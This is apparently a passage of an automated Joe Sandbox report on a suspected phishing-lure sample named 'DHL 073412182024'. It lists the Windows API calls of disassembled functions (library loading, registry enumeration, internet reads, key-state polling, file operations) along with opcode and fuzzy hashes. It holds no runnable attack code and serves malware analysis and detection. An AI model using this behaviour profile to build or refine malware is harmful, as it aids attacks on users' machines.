                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                      • API String ID: 145871493-2590602151
                                                                                      • Opcode ID: e67ee73b94851f06a84802a8f19677a62224b202138ce702ee11e67a962c2ac0
                                                                                      • Instruction ID: 2ad04520586b5d4272f08c85db852926f3bed565f1e9d0de087e0128970fafed
                                                                                      • Opcode Fuzzy Hash: e67ee73b94851f06a84802a8f19677a62224b202138ce702ee11e67a962c2ac0
                                                                                      • Instruction Fuzzy Hash: 9EF020354066289BE7302B108C0897D3A63AF00B01B6BD098EB82F2104DB20CC44A7FB
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DA4EDD,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4E9C
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DA4EAE
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00DA4EDD,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4EC0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-3689287502
                                                                                      • Opcode ID: f21e72a2fe851eba3cde6533d01cf1f42236d5016347d303c58955ab2cb4f94c
                                                                                      • Instruction ID: 349fb2e4301625cfd8466616ffb47df6a155abf8d0beacedb7c249bc5ea665e3
                                                                                      • Opcode Fuzzy Hash: f21e72a2fe851eba3cde6533d01cf1f42236d5016347d303c58955ab2cb4f94c
                                                                                      • Instruction Fuzzy Hash: CCE0E636A026225F922117267C1DA5B6964AFC2B62B190115FD05F2151DBA4CE0596F1
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DE3CDE,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4E62
                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DA4E74
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00DE3CDE,?,00E71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00DA4E87
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                      • API String ID: 145871493-1355242751
                                                                                      • Opcode ID: 41c57bed2d20133e63d1c471519e5bd6affd414e7ee1569b9270a9aae0019de2
                                                                                      • Instruction ID: de96a1d1d338614b51d61bd9070afe5fa03eccf9985b634d2439cf374f5fc7b7
                                                                                      • Opcode Fuzzy Hash: 41c57bed2d20133e63d1c471519e5bd6affd414e7ee1569b9270a9aae0019de2
                                                                                      • Instruction Fuzzy Hash: 7AD012365036215B56621B267C1CD8B6E68AFC6B513190515B915F2154CFA0CE05D6E1
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00E2A427
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E2A435
                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E2A468
                                                                                      • CloseHandle.KERNEL32(?), ref: 00E2A63D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                      • String ID:
                                                                                      • API String ID: 3488606520-0
                                                                                      • Opcode ID: 44aaaeb51b87f589e55a711ec3cfbb568804607cc7dd6d06902a9029bc54f73a
                                                                                      • Instruction ID: 0fdfd866896e32bbadb9cc74372c2084e26fc366b1a414f4ff29c0147a8cf216
                                                                                      • Opcode Fuzzy Hash: 44aaaeb51b87f589e55a711ec3cfbb568804607cc7dd6d06902a9029bc54f73a
                                                                                      • Instruction Fuzzy Hash: BCA181716043019FD720DF24D886F2AB7E5EF88714F18986DF55AAB2D2D770EC418BA2
                                                                                      APIs
                                                                                        • Part of subcall function 00E0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E0CF22,?), ref: 00E0DDFD
                                                                                        • Part of subcall function 00E0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E0CF22,?), ref: 00E0DE16
                                                                                        • Part of subcall function 00E0E199: GetFileAttributesW.KERNEL32(?,00E0CF95), ref: 00E0E19A
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E0E473
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E0E4AC
                                                                                      • _wcslen.LIBCMT ref: 00E0E5EB
                                                                                      • _wcslen.LIBCMT ref: 00E0E603
                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E0E650
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3183298772-0
                                                                                      • Opcode ID: 7473fe8a62a00be0daf485f62b15db7e9dc78e1257e228bafabddba3ce182223
                                                                                      • Instruction ID: 13080aab4f7a3fb6f53aa5b926a35cb8026e8051d4c28a29a96c4a94b2f4058e
                                                                                      • Opcode Fuzzy Hash: 7473fe8a62a00be0daf485f62b15db7e9dc78e1257e228bafabddba3ce182223
                                                                                      • Instruction Fuzzy Hash: A95160B24083455BC724EBA0DC91ADBB3ECEF85344F104D2EF589E3191EE75A6888776
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2B6AE,?,?), ref: 00E2C9B5
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2C9F1
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2CA68
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2BAA5
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2BB00
                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E2BB63
                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00E2BBA6
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E2BBB3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                      • String ID:
                                                                                      • API String ID: 826366716-0
                                                                                      • Opcode ID: 46179cb81527df33999aa7b5bc5f328c6fe3ff3dfc0e952fed6dd943bd790cd2
                                                                                      • Instruction ID: cf83302560576e84e558ffc5b0b943968c3a86f3dbc9e9d9f264003cb4fd779e
                                                                                      • Opcode Fuzzy Hash: 46179cb81527df33999aa7b5bc5f328c6fe3ff3dfc0e952fed6dd943bd790cd2
                                                                                      • Instruction Fuzzy Hash: 1C61C171208241AFC314DF24D894E2ABBE5FF85308F54955CF49A9B2A2CB31ED45CFA2
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 00E08BCD
                                                                                      • VariantClear.OLEAUT32 ref: 00E08C3E
                                                                                      • VariantClear.OLEAUT32 ref: 00E08C9D
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E08D10
                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E08D3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                      • String ID:
                                                                                      • API String ID: 4136290138-0
                                                                                      • Opcode ID: 4225b7cc55d308b894df177e0319f1fd0abc0df8b6c675d6b53d916cf297abde
                                                                                      • Instruction ID: 1a778d0ba892349ea151b3cf2dfdc1ffcccb6b31ca875fa2cb3afb8edee1cb70
                                                                                      • Opcode Fuzzy Hash: 4225b7cc55d308b894df177e0319f1fd0abc0df8b6c675d6b53d916cf297abde
                                                                                      • Instruction Fuzzy Hash: 1D518BB1A00219EFCB14CF68C894AAABBF8FF89314B118559F955EB350E730E951CF90
                                                                                      APIs
                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E18BAE
                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E18BDA
                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E18C32
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E18C57
                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E18C5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                      • String ID:
                                                                                      • API String ID: 2832842796-0
                                                                                      • Opcode ID: 530a83cde4642a63064769447489990c5de8f865a99ca232a471cb94d1efe6cf
                                                                                      • Instruction ID: 1787949f79751f3475d43c12ca0a1bddee75a3f484e1787fdbfa902f729296a4
                                                                                      • Opcode Fuzzy Hash: 530a83cde4642a63064769447489990c5de8f865a99ca232a471cb94d1efe6cf
                                                                                      • Instruction Fuzzy Hash: 96514C35A00214DFCB00DF65C881AAABBF5FF49314F088458E849AB3A2CB31ED51CBA1
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00E28F40
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E28FD0
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E28FEC
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E29032
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E29052
                                                                                        • Part of subcall function 00DBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E11043,?,753CE610), ref: 00DBF6E6
                                                                                        • Part of subcall function 00DBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DFFA64,00000000,00000000,?,?,00E11043,?,753CE610,?,00DFFA64), ref: 00DBF70D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                      • String ID:
                                                                                      • API String ID: 666041331-0
                                                                                      • Opcode ID: 8a219e8b6024eaf75a70e34c3c6164c502df8d28970aacd38289230ae8d63eb2
                                                                                      • Instruction ID: 8679b7a01743808be4e92e623d1bd46099c20ff3f8ddd4c72e2e46e0fdafd067
                                                                                      • Opcode Fuzzy Hash: 8a219e8b6024eaf75a70e34c3c6164c502df8d28970aacd38289230ae8d63eb2
                                                                                      • Instruction Fuzzy Hash: 7B512935601219DFC711DF54C5948ADBBB1FF49324F089099E806AB362DB31ED86CBA0
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E36C33
                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00E36C4A
                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E36C73
                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E1AB79,00000000,00000000), ref: 00E36C98
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E36CC7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                      • String ID:
                                                                                      • API String ID: 3688381893-0
                                                                                      • Opcode ID: 6c1646144765ea4d1cd2e62e328cc9d8220f38cd7bac207560051bf354809e9f
                                                                                      • Instruction ID: 19710e0d5a2687365560016d9c95e1c15417ec056c1bac4289d8c80ee56c421b
                                                                                      • Opcode Fuzzy Hash: 6c1646144765ea4d1cd2e62e328cc9d8220f38cd7bac207560051bf354809e9f
                                                                                      • Instruction Fuzzy Hash: 9141AF35A04104BFDB24CF39CC5DFA9BFA5EB49354F14A268E999B72A0C371ED41CA50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 3d2881cb06fcf36962ec480884cefb127a563b9a58e8ec26a0d56c4ec3f19082
                                                                                      • Instruction ID: 50e0562e27e75ea5eef7bbd774226e852f6f6d3149491c8dab4a8f2d0be8d9ab
                                                                                      • Opcode Fuzzy Hash: 3d2881cb06fcf36962ec480884cefb127a563b9a58e8ec26a0d56c4ec3f19082
                                                                                      • Instruction Fuzzy Hash: 5241A132A00200AFCB24DF78C881A7EB7B5EF99314B1985AAE555EB355D731ED01DBA0
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00DB9141
                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00DB915E
                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00DB9183
                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00DB919D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                      • String ID:
                                                                                      • API String ID: 4210589936-0
                                                                                      • Opcode ID: e3bd6b5cc8972323a37bc922128fff4d68945182ea8625f9f711acbd6533bbeb
                                                                                      • Instruction ID: 52d6e59da1c22e82c22528c71fb147a52b8cb7d34df308d813e2caa98ff9a94b
                                                                                      • Opcode Fuzzy Hash: e3bd6b5cc8972323a37bc922128fff4d68945182ea8625f9f711acbd6533bbeb
                                                                                      • Instruction Fuzzy Hash: 77418F3190860AFBDF059F68C858BFEFB74FF05360F258219E569A6290C7309954DB61
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 00E138CB
                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E13922
                                                                                      • TranslateMessage.USER32(?), ref: 00E1394B
                                                                                      • DispatchMessageW.USER32(?), ref: 00E13955
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E13966
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                      • String ID:
                                                                                      • API String ID: 2256411358-0
                                                                                      • Opcode ID: 45731f38d73bbe4b9323174ee5ef8e61e3517c58bae6dd03cf6e5eb77e5aa4a6
                                                                                      • Instruction ID: 56991dcec286d39367b501580894f4acaea274656db2d8e4dd9791c0ae2011d6
                                                                                      • Opcode Fuzzy Hash: 45731f38d73bbe4b9323174ee5ef8e61e3517c58bae6dd03cf6e5eb77e5aa4a6
                                                                                      • Instruction Fuzzy Hash: D631D970504345AEEB35CB359849FF67BA4EB45308F1415ADD466B20D4E3B496C9CB11
                                                                                      APIs
                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E1C21E,00000000), ref: 00E1CF38
                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00E1CF6F
                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00E1C21E,00000000), ref: 00E1CFB4
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E1C21E,00000000), ref: 00E1CFC8
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E1C21E,00000000), ref: 00E1CFF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                      • String ID:
                                                                                      • API String ID: 3191363074-0
                                                                                      • Opcode ID: 72b5081e3abfb3f1a8760cb4ddb05fe8ec2ff30669c87526acf3d7aec80e3454
                                                                                      • Instruction ID: 70e7269f7f474f2ac4fe3a46378906555620ba2bbd99f1957cff1218687b40cb
                                                                                      • Opcode Fuzzy Hash: 72b5081e3abfb3f1a8760cb4ddb05fe8ec2ff30669c87526acf3d7aec80e3454
                                                                                      • Instruction Fuzzy Hash: 19315071644605EFDB20DFA5C888AEBBBF9EB18354B20542EF516F2150DB30ED86DB60
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 00E01915
                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E019C1
                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00E019C9
                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E019DA
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E019E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3382505437-0
                                                                                      • Opcode ID: 3eecb679da2a810023595b7495e48972604ebbcc37d969f2e10b20ce3cdb81f2
                                                                                      • Instruction ID: f26771c7152710f0b612348ff22d479b38530e34af407346fc144625238b4b92
                                                                                      • Opcode Fuzzy Hash: 3eecb679da2a810023595b7495e48972604ebbcc37d969f2e10b20ce3cdb81f2
                                                                                      • Instruction Fuzzy Hash: 8E31BF71A00219EFCB00CFA8CD99ADE3BB5EB45319F505269F921BB2D1C770D984DB91
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E35745
                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E3579D
